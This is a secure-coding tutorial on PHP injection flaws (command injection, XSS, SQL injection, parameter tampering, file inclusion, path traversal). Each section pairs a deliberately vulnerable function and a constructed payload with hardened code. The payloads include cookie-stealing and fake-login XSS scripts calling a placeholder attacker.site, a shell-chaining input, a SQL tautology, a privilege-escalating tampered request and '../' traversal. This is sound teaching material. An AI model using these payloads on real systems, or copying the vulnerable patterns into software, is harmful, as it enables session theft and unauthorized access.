
Injection vulnerabilities allow an attacker to supply code or data that the application passes, unchecked, into an interpreter (a database engine, a shell, a browser), where it is executed or parsed as part of the program's own instructions and causes unintended, often dangerous behavior.
SQL Injection. Description: A vulnerability that allows an attacker to inject SQL into database queries.
Example: A web application that builds SQL queries by concatenating user input, without validation or parameterization, allowing an attacker to execute arbitrary SQL.
OS Command Injection. Description: A vulnerability that allows an attacker to inject operating system commands.
Example: An application that passes user input into a shell command line, allowing an attacker to terminate the intended command and append commands of their own.
Cross-Site Scripting (XSS). Description: A vulnerability that allows an attacker to inject JavaScript into web pages that is then executed in other users' browsers.
Example: An application that displays user input without output encoding, allowing an attacker to inject script.
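As an added example (not code from the original page), the command-injection case above in PHP: a directory-listing helper that shells out to ls, the constructed payload that abuses it, and two hardened versions. It assumes a POSIX system with ls and id on PATH and PHP 7.4 or newer (for the array form of proc_open).

```php
<?php
// Added example, not code from the original page. Assumes a POSIX
// system with ls and id available; the payload is constructed.

// Vulnerable: the user-supplied path is interpolated into a shell command
// line, so shell metacharacters (; | && $( )) end the ls command and
// start the attacker's own.
function list_dir_vulnerable(string $dir): string
{
    return (string) shell_exec("ls -ld " . $dir . " 2>&1");
}

// Hardened step 1: escapeshellarg() quotes the value so the shell treats
// it as exactly one argument, whatever characters it contains.
function list_dir_escaped(string $dir): string
{
    return (string) shell_exec("ls -ld " . escapeshellarg($dir) . " 2>&1");
}

// Hardened step 2 (preferred): validate the input against what the feature
// actually needs, then run the program without a shell at all (proc_open
// with an argv array, PHP 7.4+), so there is no shell to inject into.
function list_dir_noshell(string $dir): string
{
    if (!preg_match('~^/[A-Za-z0-9._/-]*$~', $dir)) {
        throw new InvalidArgumentException('invalid path');
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['ls', '-ld', $dir], $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start ls');
    }
    $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Constructed attacker input: terminates the ls command and runs id.
$payload = '/tmp; id';

echo "Vulnerable (the shell runs id):\n", list_dir_vulnerable($payload), "\n";
echo "escapeshellarg (ls receives one odd argument):\n", list_dir_escaped($payload), "\n";
echo "No shell:\n";
try {
    echo list_dir_noshell($payload);
} catch (InvalidArgumentException $e) {
    echo "rejected (", $e->getMessage(), ")\n";
}
echo list_dir_noshell('/tmp');
```

escapeshellarg() is the minimum fix for code that must keep using a shell; the argv form removes the shell entirely, which also closes the cases escaping alone does not cover, such as an argument that the program itself interprets as an option.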
XSS (Cross-Site Scripting) is a vulnerability that allows an attacker to inject script into a web page so that it runs in the victim's browser, under the origin of the vulnerable site. This can lead to theft of session cookies, modification of the page content, or redirection of the user to a malicious site.
Because the injected JavaScript runs with the site's origin, it can do anything the victim's own session can: read cookies that are not marked HttpOnly, issue requests as the logged-in user, or rewrite the page the user is looking at.
To prevent XSS, validate input and, above all, encode output for the context it is written into:
Input validation: Check that data received from the user has the expected form (type, length, allowed characters). htmlspecialchars() is an output-encoding function, not an input filter; applying it to data before storage corrupts the data and does not protect places where the value is later rendered in a different context.
Output encoding: Escape data at the point where it is written into HTML, with htmlspecialchars($value, ENT_QUOTES, 'UTF-8') in PHP or the autoescaping of the Twig or Blade template engines. Values placed into JavaScript, URLs or CSS need the encoding for that context, and the template helpers that emit raw HTML (Twig's |raw filter, Blade's {!! !!} syntax) must never receive user data.
HttpOnly flag: Set the HttpOnly flag on session cookies so that they cannot be read from JavaScript. This limits cookie theft when encoding has been missed somewhere, but it does nothing against the other effects of an injected script.
Theft of cookies:
Forgery of page content:
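An added example (not code from the original page) that covers the two attack outcomes named above and the prevention steps: a reflected XSS in a hypothetical PHP search page that echoes the q parameter, a constructed cookie-theft payload and a constructed content-forgery payload, and the same page with output encoding. attacker.site is a placeholder host.

```php
<?php
// Added example, not code from the original page. The search page, the
// attacker host and both payloads are constructed for the demonstration.

// Vulnerable: user input is written into the HTML response unencoded.
function render_results_vulnerable(string $q): string
{
    return "<h1>Results for: $q</h1>";
}

// Hardened: encode for the HTML context at output time. ENT_QUOTES also
// encodes single quotes, so the value is safe inside quoted attributes;
// the charset must match the page's Content-Type.
function render_results_safe(string $q): string
{
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<h1>Results for: $safe</h1>";
}

// 1. Theft of cookies: the script ships document.cookie to the attacker
//    by loading an image from the attacker's server.
$cookieTheft = "<script>new Image().src='http://attacker.site/c?'+encodeURIComponent(document.cookie)</script>";

// 2. Forgery of page content: the script replaces the page body with a
//    fake login form that posts to the attacker.
$contentForgery = "<script>document.body.innerHTML='<form action=\"http://attacker.site/login\"><input name=\"pw\" type=\"password\"><button>Sign in</button></form>'</script>";

foreach (['cookie theft' => $cookieTheft, 'content forgery' => $contentForgery] as $name => $payload) {
    echo "== $name ==\n";
    echo "Vulnerable: ", render_results_vulnerable($payload), "\n";
    echo "Encoded:    ", render_results_safe($payload), "\n\n";
}

// Issuing the session cookie with HttpOnly (plus Secure and SameSite)
// blocks payload 1 from reading it even where encoding was forgotten; it
// does nothing against payload 2. Call this before any output is sent.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}
```

In the encoded output both payloads appear on the page as literal text; the browser never sees a script element. The same encoding must be applied by every template that renders the value, which is why autoescaping in Twig or Blade is preferable to calling htmlspecialchars() by hand.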
SQL Injection is a vulnerability in which attacker-supplied input becomes part of the SQL text of a database query, so the attacker can change the meaning of the query and read, modify or delete data beyond what the application intended.
Dangerous SQL query:
An attacker can inject SQL into $someString because the variable is concatenated directly into the query text: a single quote in the input closes the string literal, and everything after it is parsed as SQL.
Preventing SQL Injection:
Use prepared statements: the SQL text, containing placeholders, is sent to the database separately from the parameter values, so a value can never be interpreted as part of the query.
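An added example (not code from the original page) showing the concatenated query, the constructed tautology payload, and the prepared-statement version side by side. It uses an in-memory SQLite database through PDO so it runs offline; the users table and its rows are constructed for the demonstration.

```php
<?php
// Added example, not code from the original page. The database, table
// and rows are constructed in memory.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)");
$pdo->exec("INSERT INTO users (username, password_hash) VALUES ('alice', 'hash-a'), ('bob', 'hash-b')");

// Dangerous: $someString is concatenated into the SQL text, so a quote
// character in it changes the structure of the query.
function find_user_vulnerable(PDO $pdo, string $someString): array
{
    $sql = "SELECT id, username FROM users WHERE username = '" . $someString . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Prepared statement: the SQL text is fixed; the value travels as a bound
// parameter and is compared as data, never parsed as SQL.
function find_user_safe(PDO $pdo, string $someString): array
{
    $stmt = $pdo->prepare("SELECT id, username FROM users WHERE username = :name");
    $stmt->execute([':name' => $someString]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input: closes the string literal and appends a
// tautology, so the WHERE clause of the concatenated query matches every row.
$payload = "x' OR '1'='1";

echo "Concatenated query returns ", count(find_user_vulnerable($pdo, $payload)), " row(s)\n";
echo "Prepared statement returns  ", count(find_user_safe($pdo, $payload)), " row(s)\n";
```

The prepared statement looks for a user literally named x' OR '1'='1 and finds none, while the concatenated query returns every user. Placeholders can only stand for values: table and column names, ORDER BY targets and LIMIT clauses that come from the client still have to be checked against an allowlist before they are put into the query text.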
HTTP Parameter Injection (parameter tampering) is a vulnerability that occurs when the server trusts values in the HTTP request (query string, form fields, hidden inputs, cookies) that the client can change at will, so an attacker modifies them to gain unauthorized access or alter data. Every parameter that arrives from the client must be validated, and decisions about who may change what must be based on server-side state such as the authenticated session, not on a request parameter.
Vulnerable code that trusts request parameters:
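An added example (not code from the original page): a hypothetical profile-update handler that chooses the record to modify from a user_id field in the request and copies every submitted field into it, next to a version that takes the identity from the session and accepts only an allowlist of fields. The session, the request and the in-memory "database" are constructed so the script runs without a web server.

```php
<?php
// Added example, not code from the original page. The records, session
// and tampered request are constructed in memory.
$db = [
    1 => ['email' => 'alice@example.com', 'role' => 'user'],
    2 => ['email' => 'bob@example.com',   'role' => 'user'],
];

// Vulnerable: trusts user_id from the request to select the record and
// copies every submitted field into it, so an attacker can edit another
// user's account and set fields the form never offered (role=admin).
function update_profile_vulnerable(array &$db, array $post): void
{
    $id = (int) $post['user_id'];
    foreach ($post as $field => $value) {
        if ($field !== 'user_id') {
            $db[$id][$field] = $value;
        }
    }
}

// Hardened: the record comes from the authenticated session, and only an
// allowlist of fields, each validated, can be set from the request. A
// field such as role is changed only by a separate, authorised code path.
function update_profile_safe(array &$db, array $session, array $post): void
{
    $id = $session['user_id'];   // server-side identity, not a request parameter
    $allowed = ['email' => FILTER_VALIDATE_EMAIL];
    foreach ($allowed as $field => $filter) {
        if (!array_key_exists($field, $post)) {
            continue;
        }
        $value = filter_var($post[$field], $filter);
        if ($value === false) {
            throw new InvalidArgumentException("invalid value for $field");
        }
        $db[$id][$field] = $value;
    }
}

// Constructed tampered request: user 1 is logged in, but the hidden
// user_id was changed to 2 and a role field was added to the form data.
$session  = ['user_id' => 1];
$tampered = ['user_id' => '2', 'email' => 'evil@example.com', 'role' => 'admin'];

$copy = $db;
update_profile_vulnerable($copy, $tampered);
echo "Vulnerable: user 2 became ", json_encode($copy[2]), "\n";

$copy = $db;
update_profile_safe($copy, $session, $tampered);
echo "Safe: user 2 is still ", json_encode($copy[2]), "; user 1 is ", json_encode($copy[1]), "\n";
```

With the hardened handler the tampered user_id and role are simply ignored and only the logged-in user's own e-mail changes. The same rule applies to prices, quantities, account numbers and similar values carried in hidden fields: the server must look them up or recompute them rather than accept what the client sent.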
File vulnerabilities arise from improper handling or validation of file paths and of files uploaded by users, or from weaknesses in the web server itself.
Using require() and include() with a user-controlled path in PHP:
If allow_url_include is enabled, an attacker can make the application include a remote file, for example http://attacker.site/malicious.php, and the server executes its code (remote file inclusion). The setting is Off by default, but that does not protect local files.
Weak file validation:
An attacker can use ../ sequences to traverse out of the intended directory and include or read other files on the server (path traversal, local file inclusion). Checking for an expected prefix or extension in the raw string is not enough; the path must be resolved and verified against the directory it is allowed to be in, or better, mapped from a fixed allowlist.
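An added example (not code from the original page) that covers both the include() and the ../ cases above: a hypothetical page loader that includes a file named by the request, the constructed traversal payload against it, and a hardened loader that maps the request to an allowlist and then verifies the resolved path with realpath(). The pages/ directory and its files are created in a temporary directory so the script runs as-is.

```php
<?php
// Added example, not code from the original page. The pages/ directory,
// home.php and secret.txt are constructed in a temp dir for the demo.
$base = sys_get_temp_dir() . '/inc-demo-' . getmypid();
mkdir("$base/pages", 0700, true);
file_put_contents("$base/pages/home.php", "<?php echo 'home page';\n");
file_put_contents("$base/secret.txt", "not meant to be served\n");

// Vulnerable: the include path is built from the request value.
// - With allow_url_include=On, page=http://attacker.site/malicious.php
//   fetches and executes remote code (remote file inclusion).
// - Even with it Off, page=../secret.txt reaches outside pages/ and the
//   file is output as text, or executed if it contains PHP (path traversal).
function show_page_vulnerable(string $base, string $page): void
{
    include "$base/pages/$page";
}

// Hardened, two independent layers:
// 1. The request value selects an entry in a fixed allowlist; anything else
//    is rejected, so no user-controlled string ever reaches include().
// 2. Defence in depth: resolve the final path with realpath() and check it
//    is still inside the pages/ directory.
function show_page_safe(string $base, string $page): void
{
    $allowed = ['home' => 'home.php', 'about' => 'about.php'];
    if (!isset($allowed[$page])) {
        throw new InvalidArgumentException('unknown page');
    }
    $root   = realpath("$base/pages");
    $target = realpath($root . '/' . $allowed[$page]);
    if ($target === false || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('path escapes pages/');
    }
    include $target;
}

// Constructed attacker input: a traversal sequence.
$traversal = '../secret.txt';

echo "Vulnerable: ";
show_page_vulnerable($base, $traversal);

echo "Safe: ";
try {
    show_page_safe($base, $traversal);
} catch (InvalidArgumentException $e) {
    echo "rejected (", $e->getMessage(), ")\n";
}
echo "Safe, legitimate request: ";
show_page_safe($base, 'home');
echo "\n";

// Remove the constructed files.
unlink("$base/pages/home.php");
unlink("$base/secret.txt");
rmdir("$base/pages");
rmdir($base);
```

The allowlist is the real fix: the request value is never a path, only a key. The realpath() check catches mistakes in the allowlist itself (a symlink, an entry that was later pointed elsewhere). Keep allow_url_include Off and consider open_basedir as further layers, and remember that the same traversal applies to file_get_contents(), readfile() and upload destinations, not only to include().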